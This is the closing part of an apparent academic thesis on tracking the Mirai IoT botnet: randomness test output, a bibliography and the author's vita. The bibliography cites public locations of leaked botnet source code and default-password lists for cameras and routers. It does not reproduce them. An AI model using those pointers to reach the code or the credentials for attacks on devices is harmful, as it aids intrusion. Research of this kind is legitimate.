rgb_lagged_sum| 2| 1000000| 100|0.37185446| PASSED # The file file_input was rewound 6 times rgb_lagged_sum| 3| 1000000| 100|0.89451232| PASSED # The file file_input was rewound 6 times rgb_lagged_sum| 4| 1000000| 100|0.72328699| PASSED # The file file_input was rewound 7 times rgb_lagged_sum| 5| 1000000| 100|0.38420350| PASSED # The file file_input was rewound 7 times rgb_lagged_sum| 6| 1000000| 100|0.94217892| PASSED # The file file_input was rewound 8 times rgb_lagged_sum| 7| 1000000| 100|0.62527044| PASSED # The file file_input was rewound 9 times rgb_lagged_sum| 8| 1000000| 100|0.25248113| PASSED # The file file_input was rewound 10 times rgb_lagged_sum| 9| 1000000| 100|0.48382543| PASSED # The file file_input was rewound 11 times rgb_lagged_sum| 10| 1000000| 100|0.95248385| PASSED # The file file_input was rewound 12 times rgb_lagged_sum| 11| 1000000| 100|0.40536936| PASSED # The file file_input was rewound 14 times rgb_lagged_sum| 12| 1000000| 100|0.31216446| PASSED # The file file_input was rewound 15 times rgb_lagged_sum| 13| 1000000| 100|0.19243117| PASSED # The file file_input was rewound 17 times rgb_lagged_sum| 14| 1000000| 100|0.79758242| PASSED # The file file_input was rewound 18 times rgb_lagged_sum| 15| 1000000| 100|0.60939845| PASSED # The file file_input was rewound 20 times rgb_lagged_sum| 16| 1000000| 100|0.99926753| WEAK # The file file_input was rewound 22 times rgb_lagged_sum| 17| 1000000| 100|0.91456988| PASSED # The file file_input was rewound 24 times rgb_lagged_sum| 18| 1000000| 100|0.22601368| PASSED # The file file_input was rewound 26 times rgb_lagged_sum| 19| 1000000| 100|0.79273460| PASSED # The file file_input was rewound 28 times rgb_lagged_sum| 20| 1000000| 100|0.67312082| PASSED # The file file_input was rewound 30 times rgb_lagged_sum| 21| 1000000| 100|0.51838941| PASSED # The file file_input was rewound 32 times rgb_lagged_sum| 22| 1000000| 100|0.53383580| PASSED # The file file_input was rewound 35 times rgb_lagged_sum| 23| 1000000| 100|0.58942490| PASSED # The file file_input was rewound 37 times rgb_lagged_sum| 24| 1000000| 100|0.76227644| PASSED # The file file_input was rewound 40 times rgb_lagged_sum| 25| 1000000| 100|0.74931331| PASSED # The file file_input was rewound 42 times rgb_lagged_sum| 26| 1000000| 100|0.06591543| PASSED # The file file_input was rewound 45 times rgb_lagged_sum| 27| 1000000| 100|0.99598155| WEAK # The file file_input was rewound 48 times rgb_lagged_sum| 28| 1000000| 100|0.02597328| PASSED # The file file_input was rewound 51 times rgb_lagged_sum| 29| 1000000| 100|0.07184119| PASSED # The file file_input was rewound 54 times rgb_lagged_sum| 30| 1000000| 100|0.00689498| PASSED # The file file_input was rewound 57 times rgb_lagged_sum| 31| 1000000| 100|0.02626040| PASSED # The file file_input was rewound 61 times rgb_lagged_sum| 32| 1000000| 100|0.77697563| PASSED # The file file_input was rewound 61 times rgb_kstest_test| 0| 10000| 1000|0.47483945| PASSED # The file file_input was rewound 61 times dab_bytedistrib| 0| 51200000| 1|0.33010460| PASSED # The file file_input was rewound 61 times dab_dct| 256| 50000| 1|0.70630354| PASSED Preparing to run test 207. ntuple = 0 # The file file_input was rewound 61 times dab_filltree| 32| 15000000| 1|0.53420292| PASSED dab_filltree| 32| 15000000| 1|0.31348870| PASSED Preparing to run test 208. ntuple = 0 # The file file_input was rewound 61 times dab_filltree2| 0| 5000000| 1|0.15174195| PASSED dab_filltree2| 1| 5000000| 1|0.47669851| PASSED Preparing to run test 209. ntuple = 0 # The file file_input was rewound 61 times dab_monobit2| 12| 65000000| 1|0.97843053| PASSED Bibliography

[1] Council, N. (2008) “Six technologies with potential impacts on us interests out to 2025,” Disruptive Civil Technologies 2008. [2] Soper, T. (2016), “Amazon Echo sales reach 5M in two years, research ﬁrm says, as Google competitor enters market,” web, http://www.geekwire.com/2016/amazon-echo-sales-reach- 5m-two-years-research-ﬁrm-says-google-competitor-enters-market/.

[3] Sun, L. (2016), “Connected Cars in the Next Decade: 4 Numbers Everyone Should Know,” web, http://www.fool.com/investing/general/2016/03/06/connected-cars-in-the-next-decade- 4-numbers-everyo.aspx. [4] Columbus, L. (2016), “Roundup Of Internet Of Things Forecasts And Market Estimates, 2016,” web, http://www.forbes.com/sites/louiscolumbus/2016/11/27/roundup-of-internet-of- things-forecasts-and-market-estimates-2016/. [5] (2015), “Gartner Says 6.4 Billion Connected "Things" Will Be in Use in 2016, Up 30 Percent From 2015,” web, https://www.gartner.com/newsroom/id/3165317. [6] Krebs, B. (2016), “KrebsOnSecurity Hit With Record DDoS,” web, https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/.

[7] Https://github.com/jgamblin/Mirai-Source-Code. [8] York, K. (2016), “Dyn Statement on 10/21/2016 DDoS Attack,” web, https://dyn.com/blog/dyn-statement-on-10212016-ddos-attack/. [9] Hwang, Y. (2017), “The Hajime Worm â Is it the Solution to Mirai or the Next-Gen Botnet?” web, https://iot-for-all.com/hajime-worm-solution-mirai-next-gen-botnet/. [10] for Disease Control, C. (2016), “About Parasites,” web, https://www.cdc.gov/parasites/about.html. [11] “What Is the Dierence: Viruses, Worms, Trojans, and Bots?” web, https://www.cisco.com/c/en/us/about/security-center/virus-dierences.html. [12] Orman, H. (2003) “The Morris worm: A ﬁfteen-year perspective,” IEEE Security & Privacy, 99(5), pp. 35–43. [13] Seltzer, L. (2010), “’I Love You’ Virus Turns Ten: What Have We Learned?” web, http://www.pcmag.com/article2/0,2817,2363172,00.asp.

[14] Staniford, S., V. Paxson, N. Weaver, et al. (2002) “How to 0wn the Internet in Your Spare Time.” in USENIX Security Symposium, vol. 2, pp. 14–15.

65 [15] Zou, C. C., W. Gong, and D. Towsley (2002) “Code red worm propagation modeling and analysis,” in Proceedings of the 9th ACM conference on Computer and communications security, ACM, pp. 138–147.

[16] Moore, D., V. Paxson, S. Savage, C. Shannon, S. Staniford, and N. Weaver (2003) “Inside the Slammer worm,” IEEE Security Privacy, 1(4), pp. 33–39. [17] Holz, T., M. Steiner, and F. Dahl (2008) “Measurements and mitigation of Peer-to-Peer- based Botnets: A case study on storm worm,” in Proceeding of the First USENIX Workshop 0n Large-Scale Exploits and Emergent Threats (LEET’08). [18] Stone-Gross, B., M. Cova, L. Cavallaro, B. Gilbert, M. Szydlowski, R. Kem- merer, C. Kruegel, and G. Vigna (2009) “Your botnet is my botnet: analysis of a botnet takeover,” in Proceedings of the 16th ACM conference on Computer and communications security, ACM, pp. 635–647.

[19] Kelley, M. B. (2013) “The Stuxnet attack on Iranâès nuclear plant was âŸfar more dangerousâè than previously thought,” Business Insider, 20. [20] “Linux.Darlloz,” web, https://www.symantec.com/security_response/writeup.jsp. [21] Kovacs, E. (2014), “BASHLITE Malware Uses ShellShock to Hijack Devices Running Busy- Box,” web, http://www.securityweek.com/bashlite-malware-uses-shellshock-hijack-devices- running-busybox. [22] Silva, S. S., R. M. Silva, R. C. Pinto, and R. M. Salles (2013) “Botnets: A survey,” Computer Networks, 57(2), pp. 378–403. [23] Kalt, C. (2000), “Internet Relay Chat: Client Protocol,” web, https://tools.ietf.org/html/rfc2812. [24] “BOOTERS, STRESSERS AND DDOSERS,” web, https://www.incapsula.com/ddos/ booters-stressers-ddosers.html. [25] Francis, R. (2017), “Hire a DDoS service to take down your enemies,” web, http://www.csoonline.com/article/3180246/data-protection/hire-a-ddos-service-to-take- down-your-enemies.html. [26] Kan, M. (2016), “Dozens arrested in international DDoS-for-hire crackdown,” web, http://www.pcworld.com/article/3149543/security/dozens-arrested-in-international- ddos-for-hire-crackdown.html.

[27] Kassner, M. (2010), “The top 10 spam botnets: New and improved,” web, http://www.techrepublic.com/blog/10-things/the-top-10-spam-botnets-new-and- improved/. [28] Krebs, B. (2016), “Source Code for IoT Botnet ’Mirai’ Released,” web, https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/.

[29] ——— (2017) “Who is Anna-Senpai, the Mirai Worm Author?” Krebs on Security. [30] Zeifman, I., D. Bekerman, and B. Herzberg (2016) “Breaking Down Mirai: An IoT DDoS Botnet Analysis,” Imperva. Source: https://www. incapsula. com/blog/malware-analysis- mirai-ddos-botnet. html. [31] Krebs, B. (2016), “Who Makes the IoT Things Under Attack?” . [32] “BusyBox Command Help,” web, https://busybox.net/downloads/BusyBox.html. [33] Nixon, A. and P. Lamy (2016), “Mirai and IoT: Understanding DDoS Impact Means Accu- rately Analyzing the Past,” web, https://www.ﬂashpoint-intel.com/blog/cybercrime/mirai- iot-understanding-ddos-impact/. [34] “New IoT Malware? Anime/Kami,” web, https://evosec.eu/new-iot-malware/. [35] “fd_set(3) - Linux man page,” web, https://linux.die.net/man/3/fd_set.

[36] Kincaid, J. (2009), “Google’s Go: A New Programming Language That’s Python Meets C++,” web, https://techcrunch.com/2009/11/10/google-go-language/. [37] “The Go Programming Language - Package net,” web, https://golang.org/pkg/net/. [38] Brown, R. G., “Dieharder: A Random Number Test Suite,” web, http://www.phy.duke.edu/ rgb/General/dieharder.php. [39] Yao, A. C. (1982) “Theory and application of trapdoor functions,” in Foundations of Computer Science, 1982. SFCS’08. 23rd Annual Symposium on, IEEE, pp. 80–91. [40] Baig, A. (2017), “Top 5 Countries Where Cyber Attacks Originate,” web, https://securitytoday.com/Articles/2017/03/03/Top-5-Countries-Where-Cyber-Attacks- Originate.aspx. [41] “Qbot,” web, https://github.com/geniosa/qbot. [42] Ace, E. (2016), “IP Cameras Default Passwords Directory,” web, https://ipvm.com/reports/ip-cameras-default-passwords-directory.

[43] the Public Knows About Cybersecurity, W. (2017), “Kenneth Olmstead and Aaron Smith,” web, http://www.pewinternet.org/2017/03/22/what-the-public-knows-about- cybersecurity/. [44] Fair, L. (2017), “D-Link case alleges inadequate Internet of Things security practices,” web, https://www.ftc.gov/news-events/blogs/business-blog/2017/01/d-link-case- alleges-inadequate-internet-things-security. [45] “Go by Example: Channels,” web, https://gobyexample.com/channels. [46] Fisher, T. (2017), “Cisco Default Password List,” web, https://www.lifewire.com/cisco- default-password-list-2619151.

[47] “HiSilicon IP camera root passwords,” web, https://gist.github.com/gabonator/ 74cdd6ab4f733047356198c781f27d. [48] “SMC ROUTER Default Login, Password and IP,” web, http://www.cleancss.com/router- default/SMC/ROUTER. [49] “The common router ID and password Daquan,” web, http://www.programmershare.com/308830/.

Academic Vita of Meghan Riegel [email protected]

Education Master of Science in Computer Science and Engineering Bachelor of Science in Computer Engineering with Honors in Computer Science and Engineering

Thesis Title: Tracking Mirai: An In-Depth Analysis of an IoT Botnet Thesis Supervisor: Dr. Patrick McDaniel

Work Experience Cybersecurity Collaborative Research Alliance, University Park, PA 01/2015 – 05/2017 Graduate Research Assistant • Research Focuses: Networks, Network Security, Applied Cryptography, Mobile Security • Evaluated the security and privacy of social media applications on Android mobile devices • Assisted in the development and testing of multi-channel secret-sharing protocols • Investigating the security of embedded devices Applied Physics Laboratory, University Park, PA 10/2016 – 02/2017 Student Researcher • Researching topics in network analysis and reverse engineering Applied Communication Sciences, University Park, PA 06/2015 – 08/2015 Software Developer [via the Collaborative Research Alliance] • Developed network visualization tools to help researchers better understand and predict network threats GE Aviation, Grand Rapids, MI 05/2014 – 08/2014 Systems Intern

Grants Received CyberCorps Scholarship For Service Schreyer Honors College Scholarship Wolgemuth Engineering Merit Scholarship

Community Service Involvement Penn State Dance Marathon Technology Committee 04/2016 – 04/2017 Project Manager and Lead Developer – THINK Team • Spearheading the rewrite of THON’s internal website THINK, which is the central management system for the multi-million-dollar philanthropy • THINK is written in Python, HTML, CSS, and Javascript and contains over 70,000 lines of code • Leading a team of five developers and working with THON leadership to implement desired features Engineering Ambassadors 08/2014 – 05/2017 • Professional development program with an outreach mission, representing the College of Engineering • Formally trained in communicating engineering concepts and in giving formal presentations Atlas Benefitting THON, 2014 Captain, 2015 Executive Board, 2016 Dancer 08/2012 – 05/2017

Skills Proficient Languages: Bash, C/C++, HTML/CSS, JavaScript, LaTeX, Python, SQL Exposure To: Java, jQuery, MIPS, Swift Frameworks, Tools & Environments: Apache, Bootstrap, Django, GitHub, MySQL, Unix/Linux, Wireshark